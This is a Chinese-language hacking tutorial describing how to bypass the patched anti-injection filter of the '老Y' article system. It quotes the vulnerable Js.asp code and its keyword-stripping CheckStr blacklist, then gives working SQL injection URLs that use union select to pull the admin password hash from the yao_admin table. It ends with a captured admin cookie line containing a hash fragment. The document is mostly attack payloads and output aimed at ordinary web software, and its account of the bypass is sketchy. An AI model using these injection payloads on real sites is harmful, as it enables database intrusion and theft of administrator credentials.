[第34课]漏洞挖掘之绕过老y继续注入

绕过老y防注入继续注入
                                                                             幻泉[B.S.N]
            话说端午节为了黑防的广大会员，放了一个老y的注射漏洞，后来老y进行了修补，难道修补真就完美了么？当然no了。
我们先来回顾下端午节的漏洞。Js.asp
If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
'这里是获取变量利用checkstr过滤，但是感觉好像没起作用。然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获取数组1，与数组2进行整形过滤。这里没有漏洞
End if

num = LaoYRequest(request.querystring("num"))'这里num必须>=1
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"

        If NclassID<>"" and NclassID1="" then
                If Yao_MyID(NclassID)="0" then
                        SQL=SQL&" and ClassID="&NclassID&""
                else
                        MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
                        SQL=SQL&" and ClassID in ("&MyID&")"     ‘in(1,2,3)
                End if
        elseif NclassID<>"" and NclassID1<>"" then
                MyID = Replace(""&Request("ClassNo")&"","|",",")    ‘把所有的|过滤为,   1|1|2|2|2   myid=1,1,2,2,2
                SQL=SQL&" and ClassID in ("&MyID&")"                      ‘in(1,1,2) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1)
                '这里出现的问题classno并没做其他过滤就写入到查询
        End if
        
select case topType
        case "new" sql=sql&" order by DateAndTime desc,ID desc"
        case "hot" sql=sql&" order by hits desc,ID desc"
        case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"
end select

set rs = conn.execute(sql)
if rs.bof and rs.eof then
str=str+"没有符合条件的文章"
........
  这里代码都做了注解，主要就是因为只对ClassNo做了checkStr过滤并且把“|”转换成“，”。这里我们看下他的过滤先后顺序，以后要用到。第一次过滤用的是CherckStr函数过滤，然后再用replace把“|”转换为“，”。继续看CheckStr函数代码。
function CheckStr(str)
    CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")
        CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
    CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
        CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function
这里仅仅把一些常用的过滤为空。接下来我们就可以构造注射代码了。我当时已经给出获取密码的注射代码。
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1
好了前言说完，接下来进入我们的主题。老y最新版为6月16日的。我们看看最新版如何防止此注射的吧。Js.asp漏洞文件一字没改，改变的是CheckStr函数，改变如下：
function CheckStr(str)
    CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")
        CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
    CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
        CheckStr=replace(replace(replace(replace(CheckStr,"*",""),"=",""),"mid",""),"count","")
        CheckStr=replace(replace(replace(replace(CheckStr,"%",""),",",""),"union",""),"where","")
end function
如果大家看过很久以前的乔客漏洞对这种代码有可能有所了解。

已经拿到管理员的账号和md5加密密码。
1|1|2)union%20select%201,admin_pass,3,4,5,6,7,8,9%20from%20yao_admin%20where%20id%20in(1


LaoYAdmin=UserName=admin&UserPass=32f297a57a5a743894&UserID=1